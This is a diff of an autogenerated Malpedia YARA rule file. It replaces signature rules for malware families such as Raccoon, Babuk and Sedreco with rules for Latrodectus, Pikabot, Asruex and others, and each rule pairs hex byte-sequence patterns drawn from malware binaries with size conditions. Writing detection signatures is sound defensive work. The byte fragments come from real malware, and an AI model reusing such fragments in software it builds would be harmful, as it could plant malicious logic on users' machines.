+		$sequence_5 = { a7 8d16 b205 07 d32cb6 08ac22c115978d }
+		$sequence_6 = { 07 fb b05e 2bc1 e8???????? }
+		$sequence_7 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e }
+		$sequence_8 = { 07 d32cb6 08ac22c115978d 0e e8???????? }
+		$sequence_9 = { e8???????? 07 fb b05e 2bc1 e8???????? 661e }
 
 	condition:
-		7 of them and filesize < 385024
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Mailto_Auto : FILE
+rule MALPEDIA_Win_Asruex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff9d1a8b-72b0-54b9-b1c0-036aa2d1956d"
+		id = "899abd0f-c835-5f70-819c-92570cc9b462"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mailto_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.asruex_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "74f6ff054191d80b386ecb2515d44043acc73f0e2a8bfe9bc33853bab8856df0"
+		logic_hash = "a14db0e4e44f1156fe16afe843345aa29b9b1f1eb3cc060b10e0bcdf06eb97d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87280,32 +87335,32 @@ rule MALPEDIA_Win_Mailto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 e8???????? 56 ffb42498050000 8d8424e8010000 50 }
-		$sequence_1 = { 8bce d1ee 83e101 f7d9 81e12083b8ed 33ce 8bd1 }
-		$sequence_2 = { 7434 a1???????? 8d048504000000 50 ff35???????? e8???????? 83c408 }
-		$sequence_3 = { b938000000 8d3c32 2bca 33c0 8bd1 c1e902 f3ab }
-		$sequence_4 = { 47 ff742418 897c2420 6a03 e8???????? 8bf0 }
-		$sequence_5 = { 83c614 ff36 e8???????? 83c404 8d7620 83ed01 75ee }
-		$sequence_6 = { 8d4010 0f104406f0 660fefc1 0f1140f0 83e901 75eb }
-		$sequence_7 = { 6a00 6a02 ffd0 85c0 0f8517020000 53 55 }
-		$sequence_8 = { 0f1f4000 8b840c54030000 01440c0c 8b840c58030000 11440c10 8b840c5c030000 01440c14 }
-		$sequence_9 = { d1ea 83e101 f7d9 81e12083b8ed 33ca 8bd1 d1e9 }
+		$sequence_0 = { 85c0 740e 85ed 740a }
+		$sequence_1 = { e8???????? 83f8ff 7407 3d0000a000 }
+		$sequence_2 = { ff15???????? 85c0 7407 3d14270000 }
+		$sequence_3 = { 3c78 7404 3c58 7505 bb01000000 }
+		$sequence_4 = { 83f801 740e 83f803 7409 83f802 }
+		$sequence_5 = { 3c0d 7404 3c0a 7516 }
+		$sequence_6 = { 7404 3c58 7505 bb01000000 }
+		$sequence_7 = { 3c09 7408 3c0d 7404 3c0a 7516 }
+		$sequence_8 = { 7408 3c0d 7404 3c0a 7516 }
+		$sequence_9 = { 740c 3c09 7408 3c0d 7404 3c0a 7516 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 1564672
 }
-rule MALPEDIA_Win_Deputy_Auto : FILE
+rule MALPEDIA_Win_Wpbrutebot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5f636daa-92f3-5297-9096-cf07f3905b0c"
+		id = "79a22dd8-32fa-5f98-87d6-8da78951869d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deputy_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wpbrutebot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ca97585f0db258f9fdf08cb077c29b43b172f7ef4964d85d883e4007934393d7"
+		logic_hash = "5822d74137e23703d26984f7196edc8d3decd3d594175136f45cb9821ea5add2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87319,32 +87374,32 @@ rule MALPEDIA_Win_Deputy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 6808020000 50 8d85e4f9ffff 50 e8???????? 83c40c }
-		$sequence_1 = { 58 6bc000 c780ac40001002000000 6a04 }
-		$sequence_2 = { 8d0436 50 6a00 57 8985ccf9ffff e8???????? }
-		$sequence_3 = { ff15???????? eb6c 56 57 }
-		$sequence_4 = { 50 ff510c 85c0 0f85b0030000 }
-		$sequence_5 = { 8d85d0f9ffff 50 68???????? 68???????? ff15???????? 85c0 }
-		$sequence_6 = { 59 c3 e8???????? 85c0 0f843f070000 }
-		$sequence_7 = { 0f1005???????? 66a1???????? 2bca d1f9 0f11844df4fdffff 6689844d04feffff 85db }
-		$sequence_8 = { e8???????? 83c40c 8d85ecfbffff 6804010000 50 ff35???????? }
-		$sequence_9 = { ffb5c8f9ffff 8bd8 8d85e0f9ffff ffb5ccf9ffff 56 53 50 }
+		$sequence_0 = { c745f85968337b 33c0 c645fc00 8d4809 304c05f8 40 83f804 }
+		$sequence_1 = { 85c0 0f8438020000 ff7624 8b442418 ff742414 50 50 }
+		$sequence_2 = { f7e9 c1fa02 8bc2 c1e81f 03c2 83f803 764f }
+		$sequence_3 = { c1c010 85c3 7416 8b449438 8904ef b810000000 668944ef04 }
+		$sequence_4 = { ff742458 0f45c8 8d44247c ff742434 55 56 52 }
+		$sequence_5 = { c3 b8???????? eb0c b8???????? eb05 b8???????? 57 }
+		$sequence_6 = { c74008???????? c7400ca0f76200 c74010e1000000 c3 e8???????? 85c0 0f8488000000 }
+		$sequence_7 = { eb10 83f804 755e 807c244020 0f85130d0000 8b442418 8d0480 }
+		$sequence_8 = { c605????????00 e8???????? b9???????? c645fc05 e8???????? 6a6b 68???????? }
+		$sequence_9 = { 803f2f 0f8518020000 807f012f 7563 8a4702 83c702 3c2f }
 
 	condition:
-		7 of them and filesize < 51200
+		7 of them and filesize < 5134336
 }
-rule MALPEDIA_Win_Dimnie_Auto : FILE
+rule MALPEDIA_Win_Latrodectus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "faec140a-eb16-5876-b92f-a4f4dcf83df4"
+		id = "8cce3c90-39d6-56c7-a70d-a97dc872745e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dimnie_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.latrodectus_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "8e390553f6468d186c93389bf0eaa300637b1e54d4adacff8f64a890d9a8be5a"
+		logic_hash = "db1ab846766f29e28e7ba8cb8d168586ae215020b0ee3fc8ee79e547f904c4d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87358,34 +87413,40 @@ rule MALPEDIA_Win_Dimnie_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb04 c645af3d 8b4d0c 8a55af 885102 837d1002 }
-		$sequence_1 = { 7e28 8b5508 0fb64201 83e00f c1e002 8b4d08 0fb65102 }
-		$sequence_2 = { 8b450c eb54 8b550c 2b5508 83fa01 751c 0f31 }
-		$sequence_3 = { c70201000000 8b4508 8b08 83e10f 8b5508 }
-		$sequence_4 = { eb54 8b550c 2b5508 83fa01 751c }
-		$sequence_5 = { eb61 8b4d08 3b4d0c 7605 8b450c eb54 8b550c }
-		$sequence_6 = { c70201000000 8b4508 8b08 83e10f 8b5508 890a }
-		$sequence_7 = { 8855ae eb04 c645ae3d 8b450c 8a4dae }
-		$sequence_8 = { b90d000000 be???????? 8d7dbc f3a5 }
-		$sequence_9 = { 8b4d0c 8a55af 885102 837d1002 7e13 8b4508 }
+		$sequence_0 = { 488b4c2430 8801 488b442430 48ffc0 4889442430 8b44242c }
+		$sequence_1 = { 33c0 6689842430010000 ba18000000 488d8c24d0000000 e8???????? 488d8424d0000000 }
+		$sequence_2 = { 33c9 ff15???????? 488905???????? 48833d????????00 7414 }
+		$sequence_3 = { 488b542458 488d4c2428 e8???????? 488b4c2458 e8???????? 488b442420 }
+		$sequence_4 = { 488b00 488b4818 e8???????? 488b442430 488b00 4883782000 }
+		$sequence_5 = { 89442420 8b442420 4883f825 7336 8b442420 486bc018 }
+		$sequence_6 = { 488bc1 488b4c2450 0fb709 488d0488 4889442438 488b442438 }
+		$sequence_7 = { e8???????? 89442420 ba68000000 488d4c2430 e8???????? c744243068000000 }
+		$sequence_8 = { 4883e808 4883f81f 0f87ab000000 e8???????? 488bc3 488b8dd0050000 }
+		$sequence_9 = { 410fb6f0 e9???????? 80fb05 7405 80fb0b 7508 }
+		$sequence_10 = { 480f474d70 488b8580000000 4889442430 48894c2428 4889542420 4c8d05fd2d0600 }
+		$sequence_11 = { 4833c4 4889842448010000 498bf1 4d8bf0 8bfa 4c89442458 }
+		$sequence_12 = { 41b826000000 488d1591b10b00 488d4c2430 e8???????? 90 488b7c2440 }
+		$sequence_13 = { 4883ec30 488b442460 498bf9 492bf8 488bf2 482bf1 }
+		$sequence_14 = { 0f87dc030000 0faee8 e8???????? 660f6f05???????? f30f7f442478 664489642468 }
+		$sequence_15 = { 0fb605???????? 884130 c6413100 0f57c0 0f11442438 488d3da9630d00 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 2467840
 }
-rule MALPEDIA_Win_Sedreco_Auto : FILE
+rule MALPEDIA_Win_Moker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5874626-d0e0-58d9-91c8-0db502ae6b52"
+		id = "cb9352b8-7986-51d0-bfba-8cdb83b8b9cc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sedreco_auto.yar#L1-L422"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moker_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "f4bff7c9ba602579624cb55726a1e993d47a39a8f6d5c8006861ce5f5842d524"
+		logic_hash = "7734cc9477f43c35a46e19994290fc756278e602b0dee6674db4466771e526fb"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87397,69 +87458,38 @@ rule MALPEDIA_Win_Sedreco_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 836d0804 53 56 8b750c }
-		$sequence_1 = { 8b750c 56 e8???????? 6a08 }
-		$sequence_2 = { e8???????? 89450c 56 85c0 }
-		$sequence_3 = { 55 8bec 51 836d0804 }
-		$sequence_4 = { c645ff30 e8???????? 85c0 7505 }
-		$sequence_5 = { 50 68???????? 6a0d 68???????? }
-		$sequence_6 = { 7411 6a04 68???????? 68???????? }
-		$sequence_7 = { 7ce0 a1???????? 5e 85c0 }
-		$sequence_8 = { 51 6802020000 68???????? 50 }
-		$sequence_9 = { 56 be???????? 8b06 85c0 740f 50 }
-		$sequence_10 = { ffd6 8b0d???????? 894104 85c0 }
-		$sequence_11 = { 751d 6afe 8d45f0 50 }
-		$sequence_12 = { 83c40c b801000000 8b4df0 64890d00000000 59 5f }
-		$sequence_13 = { 83c604 81fe???????? 7ce0 a1???????? }
-		$sequence_14 = { ffd6 8b0d???????? 898138010000 85c0 }
-		$sequence_15 = { 488b05???????? ff90e8000000 488b0d???????? 488b05???????? ff5028 48c705????????00000000 }
-		$sequence_16 = { c744242004000000 4533c9 4533c0 ba000000c0 488b0d???????? 488b05???????? }
-		$sequence_17 = { 68???????? e8???????? 8b35???????? 83c404 6a00 }
-		$sequence_18 = { 488b05???????? ff90e8000000 ba10270000 488b0d???????? 488b05???????? }
-		$sequence_19 = { 68???????? 6a00 6a00 ffd6 8b4dfc 5f }
-		$sequence_20 = { 4883c010 4883c428 c3 48890d???????? c3 48895c2410 }
-		$sequence_21 = { 33d2 33c9 488b05???????? ff90f0000000 488905???????? }
-		$sequence_22 = { 6800010000 6a00 68???????? e8???????? 6800020000 6a00 68???????? }
-		$sequence_23 = { 488b05???????? ff90e0000000 488b0d???????? 488b05???????? ff90a8010000 }
-		$sequence_24 = { 6a00 ffd6 50 68???????? 6aff 68???????? }
-		$sequence_25 = { 41b906000200 4533c0 488b15???????? 48c7c101000080 488b05???????? ff9038010000 }
-		$sequence_26 = { 8b442458 89442428 488b442450 4889442420 41b903000000 4533c0 488b15???????? }
-		$sequence_27 = { 7cd5 68???????? e8???????? 8b4dfc }
-		$sequence_28 = { 8b4dfc 5f 5e 33cd b8???????? 5b }
-		$sequence_29 = { 6a0a 8d45f4 50 51 e8???????? }
-		$sequence_30 = { 6800000080 8d85f0fdffff 50 ff15???????? 8bf0 83feff }
-		$sequence_31 = { 894df0 ff15???????? 8945fc 8b45f0 8945f4 8b45f4 50 }
-		$sequence_32 = { 57 c785ecfeffff01000000 c785e8feffffe197af54 0f6e85e8feffff }
-		$sequence_33 = { 53 56 57 894df0 ff15???????? 8945fc }
-		$sequence_34 = { 8bf1 8b06 50 8b08 ff9180000000 }
-		$sequence_35 = { 50 ff512c 8bce 8bd8 }
-		$sequence_36 = { 6aff 50 6a00 6a00 ff15???????? 5e }
-		$sequence_37 = { 53 56 57 c745dce197af54 0f6e45dc 0f72f002 }
-		$sequence_38 = { 6a07 68???????? e8???????? 85c0 7402 eb0d 68e0930400 }
-		$sequence_39 = { 52 50 8bce e8???????? 50 ffd7 85c0 }
-		$sequence_40 = { 895e30 895e2c 895e34 8bc6 5f 5e }
-		$sequence_41 = { c645fc04 50 e8???????? 83c418 6a01 }
-		$sequence_42 = { e8???????? 8b4e2c 8b5610 89442424 6aff 8d442428 6a00 }
-		$sequence_43 = { fe40ff eb3d 8b742448 6a01 53 }
-		$sequence_44 = { 8b4c2474 8b7c2478 8944241c 56 89442424 6a01 }
-		$sequence_45 = { 8bf0 8b442414 85c0 7505 a1???????? }
-		$sequence_46 = { ff15???????? 85c0 894604 7522 8d4de4 }
+		$sequence_0 = { 0302 8945d4 8b4dd4 83c102 }
+		$sequence_1 = { 0301 8945e0 e8???????? 8b55e8 }
+		$sequence_2 = { 0100 83c414 85c0 7502 eb0a }
+		$sequence_3 = { 0302 8945e8 eb09 8b45e8 }
+		$sequence_4 = { 0302 8945dc 8b45dc 83c002 }
+		$sequence_5 = { 0302 8945e8 8b4df8 8b55fc }
+		$sequence_6 = { 6a00 8b15???????? 52 6a1e 6a3c }
+		$sequence_7 = { 0302 50 e8???????? 83c404 3b450c 750b 8b4df0 }
+		$sequence_8 = { 034508 8078fe5c 740d c6005c c6400100 }
+		$sequence_9 = { 50 6800800000 6a00 ff7508 ff15???????? e8???????? 9d }
+		$sequence_10 = { 39f7 7410 fc 39fe }
+		$sequence_11 = { 730c 8b420c 29c6 8b4214 01c6 eb06 83c228 }
+		$sequence_12 = { eb82 8b86b8000000 40 8d5002 83aec400000004 }
+		$sequence_13 = { 75eb 59 5e 5f c9 c21000 }
+		$sequence_14 = { 51 8b4510 48 ff4514 }
+		$sequence_15 = { 8d5001 52 8d5580 52 e42b }
 
 	condition:
-		7 of them and filesize < 1586176
+		7 of them and filesize < 1761280
 }
-rule MALPEDIA_Win_Raccoon_Auto : FILE
+rule MALPEDIA_Win_Doplugs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "426735cd-205f-5856-956c-bf7b885a57ea"
+		id = "4aa6b45e-3a15-5665-b8ab-574c45e7a423"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.raccoon_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doplugs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doplugs_auto.yar#L1-L105"
 		license_url = "N/A"
-		logic_hash = "30039f1e9ada41f0fa18f5ba2d7fb988ae243b357b509d0986ea0785e88878da"
+		logic_hash = "3a8a777ec93c3f944683664500df734649c491983fb906ea5cefcf412da3de95"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87473,34 +87503,32 @@ rule MALPEDIA_Win_Raccoon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff75f8 c745fcff070000 ff15???????? 85c0 7488 }
-		$sequence_1 = { e8???????? e9???????? 8d45f0 c645f001 51 50 }
-		$sequence_2 = { 7403 832700 8b5d14 33f6 83fb01 7507 }
-		$sequence_3 = { 394708 7417 684c0e0000 68???????? 68???????? }
-		$sequence_4 = { 51 8bc2 8945fc 56 8bf1 }
-		$sequence_5 = { 8d4dfc 51 8d4df8 c745ec02000000 51 }
-		$sequence_6 = { 56 57 e8???????? 83c414 ff75f4 ff15???????? }
-		$sequence_7 = { 8d45ec c706???????? 50 53 ff75e4 895dec ff15???????? }
-		$sequence_8 = { 8d55cc ff75cc 52 ff5024 807dcc00 6a04 58 }
-		$sequence_9 = { 8975e4 894df0 33c0 40 8945fc }
+		$sequence_0 = { 01fe 21f3 f7d6 21d6 09de }
+		$sequence_1 = { 83e13f c1f806 6bc938 8b0485b0390a10 0fb6440828 83e040 5d }
+		$sequence_2 = { ff15???????? 8b04bdb0390a10 834c0318ff 33c0 eb16 e8???????? c70009000000 }
+		$sequence_3 = { 6bc938 8b0485b0390a10 f644082801 7406 8b440818 5d }
+		$sequence_4 = { 89d3 83e2bf f7d3 83e340 09da }
+		$sequence_5 = { 57 8db8a4350a10 57 ff15???????? ff0d???????? 83ef18 }
+		$sequence_6 = { 31c0 8b4c2414 8b542438 8b521c 29d0 }
+		$sequence_7 = { 8b0c24 89ca 80e1ad f6d2 80e252 08d1 }
 
 	condition:
-		7 of them and filesize < 1212416
+		7 of them and filesize < 1355776
 }
-rule MALPEDIA_Win_Pinchduke_Auto : FILE
+rule MALPEDIA_Win_Pikabot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6e399a5-546d-5d19-a886-28527d9b5a32"
+		id = "4ac687d3-814a-53f0-bdd6-30b0d584e28f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pinchduke_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pikabot_auto.yar#L1-L281"
 		license_url = "N/A"
-		logic_hash = "e4ca655f5577580240493398d3de5b1f8ec351f42cf4a56b66853235bb7ac675"
+		logic_hash = "3b0362ab404ac85076078e4d22f7ab9dbd258b909dc0b4272cd29c1c8ac6cad3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87512,71 +87540,92 @@ rule MALPEDIA_Win_Pinchduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 83c610 4f 75c3 e9???????? 8d45f0 50 }
-		$sequence_1 = { c6400274 e8???????? 56 e8???????? 59 59 89442414 }
-		$sequence_2 = { e8???????? 59 59 8d8df8fdffff 3bc1 7545 }
-		$sequence_3 = { c685f7fbffff00 e8???????? 8d85f4fbffff 50 e8???????? 83c414 84c0 }
-		$sequence_4 = { 68???????? 50 e8???????? 3bc7 59 59 740f }
-		$sequence_5 = { 334dcc 8d943a9979825a 8b7df4 d1c1 8955f0 c1c205 337df8 }
-		$sequence_6 = { c9 c3 833d????????00 752f 833d????????00 }
-		$sequence_7 = { 898618040000 6a08 50 ff15???????? 898608010000 5f 8bc6 }
-		$sequence_8 = { 03f9 037df0 8908 8b4824 334804 8975fc 334838 }
-		$sequence_9 = { 53 e8???????? 59 85ff 7472 c60700 e9???????? }
+		$sequence_0 = { ebd3 8b4508 c9 c3 55 8bec }
+		$sequence_1 = { 83ec0c 8b4508 8945fc 8b450c 8945f8 8b4510 }
+		$sequence_2 = { 837df400 741a 8b45fc 8b4df8 }
+		$sequence_3 = { 40 8945f8 ebd3 8b4508 }
+		$sequence_4 = { 8945f8 8b4510 8945f4 8b4510 }
+		$sequence_5 = { 8b4510 48 894510 837df400 741a }
+		$sequence_6 = { 8b4df8 8a09 8808 8b45fc 40 8945fc 8b45f8 }
+		$sequence_7 = { 7ce9 8b4214 2b420c 5f }
+		$sequence_8 = { 8a1c08 8d4320 0fb6c8 8d53bf 80fa19 0fb6c3 0f47c8 }
+		$sequence_9 = { 56 8bf1 85c9 7419 85d2 7415 }
+		$sequence_10 = { 85c9 7436 85ff 7432 }
+		$sequence_11 = { 0fabd0 83fa20 6a08 0f43c8 }
+		$sequence_12 = { e8???????? 8bd0 e8???????? 3b45fc }
+		$sequence_13 = { 41 e8???????? ffd0 c9 c3 }
+		$sequence_14 = { 6a08 0f43c8 33c1 83fa40 }
+		$sequence_15 = { 3bc7 72d5 5b 5f 8bc6 }
+		$sequence_16 = { 83ec10 53 56 8b35???????? b84d5a0000 57 8955fc }
+		$sequence_17 = { 8a040a 84c0 75f6 c60100 8bc6 5e c3 }
+		$sequence_18 = { 0fb6d1 03c2 0fb6c0 8945f8 }
+		$sequence_19 = { 81f900010000 72f0 8bf0 33d2 }
+		$sequence_20 = { 0345f8 03c8 0fb6c9 894df8 }
+		$sequence_21 = { 40 3d00010000 72f1 8b35???????? 8bf9 }
+		$sequence_22 = { 0345f8 03c8 0fb6c1 8945f8 }
+		$sequence_23 = { 8b01 0d20202020 3d6e74646c 750f }
+		$sequence_24 = { a3???????? 8b45d4 890424 a1???????? ff5058 56 }
+		$sequence_25 = { 89442408 31c0 89442404 e8???????? 8b45e4 }
+		$sequence_26 = { 890424 e8???????? 8b8514f9ffff 89442404 a1???????? }
+		$sequence_27 = { 890424 e8???????? 8b8560f9ffff 89442404 }
+		$sequence_28 = { 890424 e8???????? 89c2 a1???????? 895048 }
+		$sequence_29 = { a1???????? 8b00 890424 e8???????? a1???????? 8b9060010000 89542404 }
+		$sequence_30 = { 890424 a1???????? ff9090000000 83ec10 }
 
 	condition:
-		7 of them and filesize < 223680
+		7 of them and filesize < 1717248
 }
-rule MALPEDIA_Elf_Babuk_Auto : FILE
+rule MALPEDIA_Win_Chthonic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8eba83d0-6c95-5d1f-85db-3750f26fdff6"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.babuk_auto.yar#L1-L131"
+		id = "9308f91d-3793-554b-b1d0-64ba8302fadb"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chthonic_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a4e1d4252d61243f852bbd89e2ebf51566a3485791e9905d978089b8c49c4cb9"
+		logic_hash = "4dc2485521a827af3e062f4f45b00520b596cc6d1b868ae843ff411ddfc73052"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 658b0d00000000 8b89fcffffff 3b6108 7678 83ec14 8b442418 8b4c241c }
-		$sequence_1 = { 8b4c2438 890f 8b542444 89570c 8b1d???????? 85db }
-		$sequence_2 = { e8???????? 8b44240c 89442410 8b4c2418 890c24 e8???????? 8b442420 }
-		$sequence_3 = { e8???????? 8b442438 8b4804 90 8b492c 894c2420 e8???????? }
-		$sequence_4 = { c3 658b1d00000000 8b9bfcffffff 8b5b18 8b5b70 8403 890424 }
-		$sequence_5 = { 01d9 8b9c24a8010000 8bbc243c030000 01fb 11cd 8b8c248c010000 8b9c2464020000 }
-		$sequence_6 = { 8b44244c 8b4c2440 31d2 eb06 8d5101 90 89f1 }
-		$sequence_7 = { 895328 8b9424b0000000 8b8c2490000000 01ca 33562c 89532c }
-		$sequence_8 = { 8b5a40 39d8 0f85360f0000 89bc2408020000 81c4dc010000 c3 89c7 }
-		$sequence_9 = { 8b4c2424 01ca 89942444050000 8b8c2490050000 c1e11a 898c2420050000 }
+		$sequence_0 = { 8bcf d3ee 83e601 eb00 8b4df8 }
+		$sequence_1 = { 0f850d010000 8b4df0 eb00 894df8 }
+		$sequence_2 = { 8a08 32ca 80e17f 8808 b001 c3 8b442404 }
+		$sequence_3 = { 74cf 8345fc02 b9000d0000 3b4df8 1bc9 f7d9 014dfc }
+		$sequence_4 = { 894df0 e9???????? 8b4514 8b4df4 8908 33c0 3b550c }
+		$sequence_5 = { 5f c1ee1f e9???????? 8b041a 6a1f 8bf0 }
+		$sequence_6 = { 80e17f 8808 b001 c3 8b442404 }
+		$sequence_7 = { e9???????? 8b041a 6a1f 8bf0 83c204 5f }
+		$sequence_8 = { 7cf4 33f6 33d2 8bc6 f77514 8b4510 8d8cb5fcfbffff }
+		$sequence_9 = { 3b550c 5f 5e 0f94c0 5b c9 c3 }
 
 	condition:
-		7 of them and filesize < 4186112
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Covid22_Auto : FILE
+rule MALPEDIA_Win_Jackpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "99a02a74-d0a3-533c-b448-35480cff51fc"
+		id = "705d47f5-8c33-5d05-9f3c-cd8693aecd05"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.covid22_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jackpos_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "968cf98e2e8c36cdb3ce45b1a5e5186c5425f3f25bc15cd333cdcc77eeba73ef"
+		logic_hash = "aebd9f3ce681adad20f8842dd1ad147a46f77997d7d0dde94d3c3be1cf2f594d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87590,34 +87639,34 @@ rule MALPEDIA_Win_Covid22_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a4d78 83c40c f6c102 8975dc 897d08 }
-		$sequence_1 = { 57 e8???????? 8d7438ff 3bf7 }
-		$sequence_2 = { 8b3d???????? ffd7 8b4608 85c0 7403 50 ffd7 }
-		$sequence_3 = { 33d9 81e3ff000000 c1e908 330c9df0904000 0fb65801 }
-		$sequence_4 = { 89c3 83fb01 7532 ff35???????? }
-		$sequence_5 = { e8???????? 8d0df4b14000 5a e8???????? 8b442414 e8???????? 50 }
-		$sequence_6 = { 83c001 8bce c1e908 330c9df0904000 0fb618 33d9 }
-		$sequence_7 = { 8d0d14b24000 e8???????? ba???????? 8d0d18b24000 e8???????? ba???????? }
-		$sequence_8 = { c705????????0a4c4000 c705????????304c4000 c705????????01000000 837d1c00 7507 c7451c00904000 }
